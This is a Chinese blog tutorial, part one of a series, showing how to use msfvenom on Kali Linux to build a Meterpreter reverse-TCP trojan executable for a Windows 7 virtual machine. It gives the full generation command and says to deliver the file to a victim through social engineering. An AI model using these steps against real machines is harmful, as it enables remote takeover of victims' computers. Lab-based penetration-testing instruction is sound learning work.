网络安全工程师演示:原来***是这样控制你的计算机的!(上)
课前声明:
1、本分享仅做学习交流,请自觉遵守法律法规!
2、搜索:Kali 与编程,学习更多网络***干货!
3、Kali 与编程每天准时更新,敬请学习和关注!
正文部分
一、背景介绍
Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用***控制受害者主机呢?接下来让我们一起学习!
二、资源装备
1.安装好 Win7的虚拟机一台
2.整装待发的小白一个。
3.安装好的Kali Linux虚拟机一台。
三、战略安排
3.1 将受害者主机(Windows7)跟***者主机(Kali Linux)的网络模式全部设置为NAT模式,如下图所示。
步骤:打开虚拟机的设置/选择网络适配器/选择NAT模式。
3.2 利用***者主机(kali linux)的相关工具(msfvenom)生成对应的***文件,如下图所示。
步骤1:msfvenom工具的参数介绍
-p, –payload < payload> 指定需要使用的payload(***荷载)。也可以使用自定义payload,几乎是支持全平台的
-o, –out < path> 指定创建好的payload的存放位置。
-h, –help 查看帮助选项。
步骤2:msfvenom工具生成对应的***文件举例,如下图所示。
步骤3:查看***者主机的主机IP地址,如下图所示。
命令:ifconfig
步骤4:利用msfvenom工具生成对应的***文件,如下图所示。
命令:msfvenom -p 指定需要使用的payload(***荷载) lhost=***者主机IP -f exe -o 生成***文件的保存位置
例子:msfVenom -p windows/meterpreter/reverse_tcp lhost=192.168.78.144 -f exe -o /root/hk.exe
步骤5:msfvenom工具生成***文件对应的命令运行结果如下图所示。
Saved as:生成的***文件保存路径。
步骤6:在已知的***文件保存路径目录下查找对应的***文件是否已经生成,如下图所示,***文件已经存在(这里使用图形化文件管理系统来查看,你也可以利用ls命令查看对应路径下面是否已经生成对应的***文件)。
3.3 利用一定的社会工程学方法将生成的***文件发送到目标受害者主机,并且在受害者主机进行运行(对应的社会工程学知识请持续关注本号,后续讲解)
小编一个个字敲打创作,可辛苦了,问君可否关注一下我呢?你还可搜索:Kali与编程,学习更多******技巧呢 !拒绝盗版,转载请声明来源:Kali与编程
点我学习更多Kali Linux***测试与网络***实战技巧!
- 网络安全工程师演示:原来***是这样控制你的计算机的!(下)
- 网络安全工程师演示:原来我的计算机可以这样被为所欲为!
- 读书笔记:计算机网络第7章:阻塞控制
- 【计算机网络】TCP中的拥塞控制机制
- 计算机网络基础(TCP如何 可靠传输 | 流量控制 | 避免网络拥塞)(传输层【下】)
- 计算机网络 P13 流量控制与可靠传输
- Apache2.4使用require指令进行访问控制--允许或限制IP访问/通过User-Agent禁止不友好网络爬虫 从Apache2.2升级到Apache2.4后,发现原来用来限制部分I
- 计算机网络的流量控制&拥塞控制,面试官不必小瞧我,你问的我都会
- 【计算机网络-4】 【第三章】数据链路层笔记1——组帧、差错控制、流量控制
- 计算机网络(10)-----TCP的拥塞控制
- 计算机基础,原来是这样滴啊
- 公网控制全攻略, 网络高手是这样炼成的
- 计算机类学生需要考计算机二级证吗?原来是这样!
- 计算机网络拥塞控制问题
- 计算机网络自顶向下方法:第五章 网络层:控制平面 课后复习题
- 计算机网络笔记--拥塞控制和流量控制区别分析
- 计算机网络:TCP拥塞控制方法
- 【计算机网络】4 Internet 控制报文协议(ICMP)
- 计算机网络 P11 组帧 P12 差错控制
- 计算机网络 -拥塞控制原理与TCP拥塞控制 -运输层